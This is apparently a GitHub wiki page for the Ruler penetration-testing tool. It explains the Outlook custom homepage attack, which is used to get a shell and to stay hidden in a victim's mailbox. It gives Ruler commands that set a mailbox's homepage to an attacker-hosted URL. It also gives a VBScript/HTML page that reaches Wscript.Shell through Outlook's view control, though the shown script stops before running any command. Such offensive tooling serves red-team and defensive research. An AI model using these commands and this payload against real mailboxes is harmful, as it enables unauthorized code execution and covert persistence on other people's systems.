Skip to content


Etienne Stalmans edited this page Sep 15, 2018 · 3 revisions


Ruler can get a shell through custom homepages. This is especially useful for persistence, as a homepage can lie dormant in the inbox, nearly undetectable.

The low down on the homepage attack is explained in the Outlook Home Page blog post.

To access the HomePage option, you need to use the homepage command. There are multiple sub-commands to homepage:


You can view the current homepage value using the display command. This will display the current URL and whether this is active or not.

./ruler --email homepage display


Setting a new homepage couldn't be simpler, you simply use Ruler to set the new homepage to your exploit URL:

./ruler --email homepage add --url "http://yourserver/pew.html"

The homepage attack requires your custom homepage to contain the "exploit", a basic version of this is:

<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<script id=clientEventHandlersVBS language=vbscript>
 Sub window_onload()
     Set Application = ViewCtl1.OutlookApplication
     Set cmd = Application.CreateObject("Wscript.Shell")
 End Sub

 <object classid="clsid:0006F063-0000-0000-C000-000000000046" id="ViewCtl1" data="" width="100%" height="100%"></object>


Deleting an existing is done in a similar way to deleting rules.

./ruler --email homepage delete


Microsoft patched this attack by preventing the Homepage from being set remotely. Ben Wilson found that you can still use the homepage for persistence if you have access to the host. He documented this in an excellent blog post:

Clone this wiki locally
You can’t perform that action at this time.